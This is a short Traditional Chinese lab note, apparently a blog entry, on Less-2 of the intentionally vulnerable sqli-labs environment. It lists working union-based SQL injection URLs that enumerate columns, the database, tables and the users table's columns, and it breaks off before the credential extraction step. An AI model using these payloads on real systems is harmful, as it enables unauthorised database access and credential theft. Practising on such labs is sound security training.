sql-lib每日一記_Less2(day2)

• 2019 年 12 月 16 日
• 筆記

SQL-Lib_Less2

• 查看源程式碼

本地環境試驗訪問地址：http://192.168.72.179/sqli-labs/Less-1/?id=1

• 查詢語句
• $sql=」SELECT * FROM users WHERE id=$id LIMIT 0,1」;
• 可以看到這裡並沒有對id進行過濾，並且查詢的是整數並以雙引號閉合
• 所以可以得知，整數注入可以直接和上面一篇一樣注入，但無需閉合

• 爆破欄位
  • http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 1 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 2 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 3 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 4（到這裡報錯說明4是最大欄位數）

• 聯合查詢
  • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,3

• 發現了上面的三個欄位的輸出位置

• 爆破資料庫
  • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,database()

• • 得到了當前資料庫為security

• 爆破security資料庫表
  • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=」security」

爆破users表中的欄位

• http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=」security」 and table_name=」users」 得到了id,username,password 三個欄位

提取欄位中的username和password內容